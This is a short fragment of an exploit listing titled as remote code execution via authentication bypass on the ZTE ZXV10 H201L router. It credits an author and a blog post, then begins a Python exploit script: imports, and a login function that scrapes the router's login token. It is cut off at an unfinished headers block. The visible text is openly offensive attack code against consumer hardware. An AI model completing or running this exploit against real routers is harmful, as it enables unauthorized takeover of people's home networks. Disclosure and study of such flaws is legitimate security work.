
ZTE ZXV10 H201L – RCE via authentication bypass
# Exploit Title: ZTE ZXV10 H201L – RCE via authentication bypass # Exploit Author: l34n (tasos meletlidis) # https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/ import http.client, requests, os, argparse, struct, zlib from io import BytesIO from os import stat from Crypto.Cipher import AES def login(session, host, port, username, password): login_token = session.get(f”http://{host}:{port}/”).text.split(“getObj(\”Frm_Logintoken\”).value = \””)[1].split(“\””)[0] headers = { …